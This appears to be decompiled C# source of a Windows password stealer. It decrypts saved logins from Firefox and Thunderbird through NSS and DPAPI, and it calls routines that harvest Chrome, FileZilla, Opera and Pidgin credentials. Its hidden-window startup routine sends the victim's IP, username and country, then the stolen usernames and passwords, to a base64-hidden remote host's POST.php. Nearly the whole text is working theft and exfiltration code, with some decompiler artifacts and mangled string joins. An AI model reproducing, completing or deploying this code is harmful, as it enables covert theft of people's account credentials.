// Token: 0x06000042 RID: 66 RVA: 0x000032A8 File Offset: 0x000014A8
private long NSS_Init(string configdir)
{
this.hModuleList.Add(PREC.LoadLibrary(this.FindFirefoxInstallationPath() + "\\mozglue.dll"));
this.NSS3 = PREC.LoadLibrary(this.FindFirefoxInstallationPath() + "\\nss3.dll");
this.hModuleList.Add(this.NSS3);
return(this.CreateAPI <PREC.DLLFunctionDelegate>(this.NSS3, "NSS_Init")(configdir));
}
// Token: 0x06000044 RID: 68 RVA: 0x000034D4 File Offset: 0x000016D4
public bool RecoverFireFox()
{
bool result = false;
checked
{
try
{
string appDataDir = Interaction.Environ("windir").ToLower().Replace("\\windows", null) + "\\users\\" + Interaction.Environ("username") + "\\AppData";
string text = this.FindFirefoxProfilePath(appDataDir).Replace("Profiles/", "Profiles\\");
if (Directory.Exists(text))
{
string input = File.ReadAllText(text + "\\logins.json");
this.NSS_Init(text + "\\");
Regex regex = new Regex("\\\"(hostname|encryptedPassword|encryptedUsername)\":\"(.*?)\"");
MatchCollection matchCollection = regex.Matches(input);
int num = 0;
int num2 = matchCollection.Count - 1;
int num3 = num;
for (;;)
{
int num4 = num3;
int num5 = num2;
if (num4 > num5)
{
break;
}
string value = matchCollection[num3].Groups[2].Value;
string value2 = matchCollection[num3 + 1].Groups[2].Value;
string value3 = matchCollection[num3 + 2].Groups[2].Value;
Account item = new Account(AccountType.Firefox, Conversions.ToString(this.DecryptFF(value2)), Conversions.ToString(this.DecryptFF(value3)), value);
this.Accounts.Add(item);
num3 += 3;
}
this.NSS_Shutdown();
try
{
foreach (IntPtr hModule in this.hModuleList)
{
PREC.FreeLibrary(hModule);
}
}
finally
{
List <IntPtr> .Enumerator enumerator;
((IDisposable)enumerator).Dispose();
}
result = true;
}
}
catch (Exception ex)
{
result = false;
}
return(result);
}
}
// Token: 0x0600003B RID: 59 RVA: 0x00002F24 File Offset: 0x00001124
private T CreateAPI <T>(IntPtr hModule, string method)
{
int num;
T t;
int num4;
object obj;
try
{
IL_01:
ProjectData.ClearProjectError();
num = -2;
IL_09:
int num2 = 2;
t = (T)((object)Marshal.GetDelegateForFunctionPointer(PREC.GetProcAddress(hModule, method), typeof(T)));
IL_29:
goto IL_89;
IL_2B:
int num3 = num4 + 1;
num4 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_45:
goto IL_7E;
IL_47:
num4 = num2;
if (num <= -2)
{
goto IL_2B;
}
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_5C :;
}
catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
{
Exception ex = (Exception)obj2;
goto IL_47;
}
IL_7E:
throw ProjectData.CreateProjectError(-2146828237);
IL_89:
T result = t;
if (num4 != 0)
{
ProjectData.ClearProjectError();
}
return(result);
}
// Token: 0x0600004D RID: 77 RVA: 0x00003D68 File Offset: 0x00001F68
private bool InternalCheckIsWow64()
{
if ((Environment.OSVersion.Version.Major == 5 && Environment.OSVersion.Version.Minor >= 1) || Environment.OSVersion.Version.Major >= 6)
{
using (Process currentProcess = Process.GetCurrentProcess())
{
bool result;
if (!PREC.IsWow64Process(currentProcess.Handle, ref result))
{
return(false);
}
return(result);
}
}
return(false);
}
// Token: 0x06000046 RID: 70 RVA: 0x0000371C File Offset: 0x0000191C
public bool RecoverThunderbird()
{
bool result = false;
IntPtr ptr = 0;
PREC.Wow64DisableWow64FsRedirection(ref ptr);
checked
{
try
{
foreach (string appDataDir in this.GetAppDataFolders())
{
string text = this.FindThunderbirdProfilePath(appDataDir);
if (Directory.Exists(text))
{
string input = File.ReadAllText(text + "\\logins.json");
this.NSS_Init(text + "\\");
Regex regex = new Regex("\\\"(hostname|encryptedPassword|encryptedUsername)\":\"(.*?)\"");
MatchCollection matchCollection = regex.Matches(input);
int num = 0;
int num2 = matchCollection.Count - 1;
int num3 = num;
for (;;)
{
int num4 = num3;
int num5 = num2;
if (num4 > num5)
{
break;
}
string value = matchCollection[num3].Groups[2].Value;
string value2 = matchCollection[num3 + 1].Groups[2].Value;
string value3 = matchCollection[num3 + 2].Groups[2].Value;
Account item = new Account(AccountType.Thunderbird, Conversions.ToString(this.DecryptFF(value2)), Conversions.ToString(this.DecryptFF(value3)), value);
this.Accounts.Add(item);
num3 += 3;
}
this.NSS_Shutdown();
try
{
foreach (IntPtr hModule in this.hModuleList)
{
PREC.FreeLibrary(hModule);
}
}
finally
{
List <IntPtr> .Enumerator enumerator;
((IDisposable)enumerator).Dispose();
}
}
}
result = true;
}
catch (Exception ex)
{
result = false;
}
PREC.Wow64RevertWow64FsRedirection(ptr);
return(result);
}
}
// Token: 0x06000030 RID: 48 RVA: 0x00002CA8 File Offset: 0x00000EA8
private string Decrypt(byte[] Datas)
{
int num;
string text;
int num4;
object obj;
try
{
IL_01:
ProjectData.ClearProjectError();
num = -2;
IL_0A:
int num2 = 2;
PREC.DATA_BLOB data_BLOB = default(PREC.DATA_BLOB);
IL_15:
num2 = 3;
PREC.DATA_BLOB data_BLOB2 = default(PREC.DATA_BLOB);
IL_20:
num2 = 4;
GCHandle gchandle = GCHandle.Alloc(Datas, GCHandleType.Pinned);
IL_2B:
num2 = 5;
data_BLOB.pbData = gchandle.AddrOfPinnedObject();
IL_3C:
num2 = 6;
data_BLOB.cbData = Datas.Length;
IL_49:
num2 = 7;
gchandle.Free();
IL_53:
num2 = 8;
string szDataDescr = null;
PREC.DATA_BLOB data_BLOB4;
PREC.DATA_BLOB data_BLOB3 = data_BLOB4;
IntPtr intPtr;
IntPtr pvReserved = intPtr;
PREC.CRYPTPROTECT_PROMPTSTRUCT cryptprotect_PROMPTSTRUCT2;
PREC.CRYPTPROTECT_PROMPTSTRUCT cryptprotect_PROMPTSTRUCT = cryptprotect_PROMPTSTRUCT2;
PREC.CryptUnprotectData(ref data_BLOB, szDataDescr, ref data_BLOB3, pvReserved, ref cryptprotect_PROMPTSTRUCT, 0, ref data_BLOB2);
IL_70:
num2 = 9;
checked
{
byte[] array = new byte[data_BLOB2.cbData + 1];
IL_84:
num2 = 10;
Marshal.Copy(data_BLOB2.pbData, array, 0, data_BLOB2.cbData);
IL_9E:
num2 = 11;
string @string = Encoding.UTF8.GetString(array);
IL_B0:
num2 = 12;
text = @string.Substring(0, @string.Length - 1);
IL_CB:
goto IL_15E;
IL_D0 :;
}
int num3 = num4 + 1;
num4 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_114:
goto IL_153;
IL_116:
num4 = num2;
if (num <= -2)
{
goto IL_D0;
}
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_12F :;
}
catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
{
Exception ex = (Exception)obj2;
goto IL_116;
}
IL_153:
throw ProjectData.CreateProjectError(-2146828237);
IL_15E:
string result = text;
if (num4 != 0)
{
ProjectData.ClearProjectError();
}
return(result);
}
// Token: 0x0600003A RID: 58 RVA: 0x00002F08 File Offset: 0x00001108
private T CreateAPI <T>(string name, string method)
{
return(this.CreateAPI <T>(PREC.LoadLibrary(name), method));
}
private void Form1_Load(object sender, EventArgs e)
{
this.Hide();
this.ShowInTaskbar = false;
this.Host = Encoding.Default.GetString(Convert.FromBase64String(this.Host));
string text = Interaction.Environ("username");
string value = Regex.Match(this.Gets("http://ip-api.com/json", new CookieContainer()), "\"query\":\"(.*?)\"").Groups[1].Value;
string text2 = Conversions.ToString(DateTime.Today.Date);
string value2 = Regex.Match(this.Gets("http://ip-api.com/json", new CookieContainer()), "\"country\":\"(.*?)\"").Groups[1].Value;
string str = this.Posts(string.Concat(new string[]
{
"ip=",
value,
"&computername=",
text,
"&installdate=",
text2,
"&country=",
value2
}), this.Host + "POST.php?online", new CookieContainer());
string text3 = null;
foreach (DriveInfo driveInfo in DriveInfo.GetDrives())
{
if (Operators.CompareString(driveInfo.RootDirectory.FullName, "C:\\", false) == 0)
{
PREC prec = new PREC(driveInfo);
PREC prec2 = prec;
prec2.RecoverChrome();
prec2.RecoverFileZilla();
prec2.RecoverFireFox();
prec2.RecoverOpera();
prec2.RecoverPidgin();
prec2.RecoverThunderbird();
try
{
foreach (Account account in prec.Accounts)
{
text3 = string.Concat(new string[]
{
text3,
"\r\n\r\n ----[ ",
Conversions.ToString((int)account.Type),
" ]---- \r\n { Domain : ",
account.Domain,
" } \r\n { Username : "******" } \r\n { Password : "******" } \r\n"
});
}
}
finally
{
List <Account> .Enumerator enumerator;
((IDisposable)enumerator).Dispose();
}
}
}
this.Posts("id=" + str + "&pass="******"POST.php?passwordenter", new CookieContainer());
ProjectData.EndApp();
}